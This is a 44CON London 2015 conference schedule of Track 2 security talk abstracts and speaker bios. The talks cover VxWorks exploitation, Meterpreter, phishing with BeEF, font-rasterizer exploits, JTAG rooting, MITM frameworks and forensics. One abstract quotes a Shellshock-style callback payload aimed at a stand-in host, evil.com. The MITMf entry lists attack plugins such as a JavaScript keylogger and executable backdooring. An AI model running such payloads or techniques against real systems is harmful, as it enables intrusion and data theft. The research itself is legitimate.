44CON LONDON 2015 has ended


Track 2 Talk
Thursday, September 10


Attacking VxWorks: from Stone Age to Interstellar
VxWorks is the world's most widely used real-time operating system deployed in embedded systems. Its market reach spans all safety-critical fields, including the Mars Curiosity rover, the Boeing 787 Dreamliner, and network routers, to name a few. The safety-critical nature of these applications makes VxWorks security a major concern.

Our team has conducted a thorough security analysis of VxWorks, including its supported network protocols and OS security mechanisms. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in Python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.


Yannick Formaggio

Yannick is a French, passionate IT security researcher at Istuary Innovation Group. He graduated from Bordeaux 1 University (France) with a Master of Science in Cryptography and IT Security in 2010. He worked 4 years as a subcontracting IT Security consultant for Airbus and Thales...

Thursday September 10, 2015 09:30 - 10:29
Track 2


Meterpreter: Understanding the New Shiny
The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target's network.

This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

It may even cover a sneak peek of what's to come further down the track!


OJ Reeves

Founder, Beyond Binary
OJ Reeves is an Australian security professional who specialises in attack simulation. When not breaking networks and software he is actively contributing to the Metasploit framework, with a particular focus on Meterpreter.

Thursday September 10, 2015 11:00 - 11:59
Track 2


Old Dog, New Tricks: Forensics With PowerShell
Recent intrusions into the networks of organizations like the Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn't "if" your organization will be targeted, but "when". With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the "image-and-forget" methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection, but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature defenders need to tackle live threats.

In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all-in-one toolset for attack response and investigation. By leveraging PowerShell's access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound "live" investigation platform without the need to image the hard drive. I'll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I'll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they're now facing. PowerShell isn't just for the red team anymore.


Jared Atkinson

Jared Atkinson is the Hunt Capability Lead with Veris Group's Adaptive Threat Division and is an Adjunct Lecturer in Utica College's M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force...

Thursday September 10, 2015 13:30 - 14:29
Track 2


Dark Fairytales from a Phisherman (Vol.II)
Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real "bad guy" may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We'll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Expect some new code to be released during this talk:

  • Phishing Frenzy and BeEF seamless integration (including geolocation services, visual map representation, and browser fingerprinting);

  • A solid BeEF autorun engine based on exploitation templates;

  • Exploit automation of common enterprise scenarios like Outlook Web Access, Citrix, HTA attacks and others.

With such an open source Swiss army knife in your tool-bag you can finally enjoy your coffee while waiting for credentials and shells.


Michele Orru

antisnatchor – Michele is the lead core developer and smart-minds-recruiter for the BeEF project. Michele is also the co-author of the "Browser Hacker's Handbook." He has a deep knowledge of programming in multiple languages and paradigms, and is excited to apply this knowledge...

Thursday September 10, 2015 14:30 - 15:29
Track 2


A Trek to the Emerald City: Ring -1 Based AV
To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of hypervisor-based AVs, to see how well they've managed to walk in the depths of Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits.

I worked on a couple of hypervisor-based AVs and found interesting attack surface points in there. I think that nowadays, although most of us are using AVs, we're not even aware of the insecurity they're providing.

Other than that, the whole hype of "VMM" or "Ring -1" things makes it even more fun; there are not many people around the globe who audit VMM code, mostly because people are afraid of those fancy words like Extended Page Tables, VM Exits and, mainly, memory handling.

In this presentation I'll try to remove this fear. I'll show the basic architecture of a VM-based AV, how it communicates with the outside world (e.g. usermode), and how it might be possible to abuse it in order to gain code execution and system control.

Shift

Shift is a Freelance Security Researcher interested in the fields of Computer Security.

Thursday September 10, 2015 16:00 - 16:59
Track 2


Reverse engineering and exploiting font rasterizers: the OpenType saga
Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80's and 90's and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.


Mateusz Jurczyk

Mateusz is the vice-captain of the Dragon Sector CTF team and a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a...

Thursday September 10, 2015 17:00 - 17:59
Track 2


Jtagsploitation: 5 wires, 5 ways to root
JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always 'game over' but it's not always clear how to turn that hardware access into privileged software access on the system.
This talk will enumerate a number of different ways to turn a 'check' for JTAG access into the 'checkmate' of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.


Joe FitzPatrick

Joe FitzPatrick (@securelyfitz) has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences...

Matt King

Matt is a hardware security researcher at a large semiconductor company.

Thursday September 10, 2015 19:35 - 20:29
Track 2
Friday, September 11


15-Minute Linux Incident Response Live Analysis
This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly determine whether or not an incident has occurred, without the need to shut down the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.


Philip Polstra

Dr. Phil Polstra was born at an early age and has been programming since age 8 and hacking electronics since age 12. He is currently an Associate Professor teaching Digital Forensics and computer security at Bloomsburg University of Pennsylvania. He is no stranger to infosec conferences...

Friday September 11, 2015 09:30 - 10:29
Track 2


Forging the USB armory
The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kinds of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, are meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specification embedded device with solely open source tools, its architecture, and security features such as secure boot and the ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.


Andrea Barisani

Andrea Barisani is an internationally recognized security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale...

Friday September 11, 2015 11:30 - 12:29
Track 2


MITMf: Bringing Man-In-The-Middle attacks to the 21st century
Tired of managing countless scripts for automating your Man-In-The-Middle attacks?
Have a cool idea for a MITM attack, but don't want to spend hours writing a script from scratch?
Tired of bashing your head against the wall trying to figure out why Ettercap's filters are not working?
Well look no further!
MITMf combines new and old MITM techniques into a framework! Written in Python, it's built to be extremely extensible and reliable, while updating the current MITM attacks for the 21st century!
Currently the following plugins are available:
Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing
BeEFAutorun - Autoruns BeEF modules based on the client's OS or browser type
AppCachePoison - Perform App cache poisoning attacks
Ferret-NG - Transparently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
jskeylogger - Injects a JavaScript keylogger into clients' web pages
Replace - Replace arbitrary content in HTML content
SMBAuth - Evoke SMB challenge-response auth attempts
Upsidedownternet - Flips images 180 degrees

Available on GitHub: https://github.com/byt3bl33d3r/MITMf


Marcello Salvati

Slightly paranoid IT security enthusiast/researcher with a pathological addiction to Sherlock Holmes novels, Sushi, Video Games and being in the middle.

Friday September 11, 2015 14:00 - 14:59
Track 2


Hunting Asynchronous Vulnerabilities
In black-box tests, vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms, like blind second-order SQL injection and shell command injection via nightly cron jobs or asynchronous logging functions, can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I'll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQLi, SMTP and even pure XML injection. I'll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.


James Kettle

Director of Research, PortSwigger Web Security
James Kettle is Director of Research at PortSwigger Web Security, where he designs and refines vulnerability detection techniques for Burp Suite's scanner. Recent work has focused on using web cache poisoning to turn caches into exploit delivery systems. James has extensive experience...

Friday September 11, 2015 15:00 - 15:59
Track 2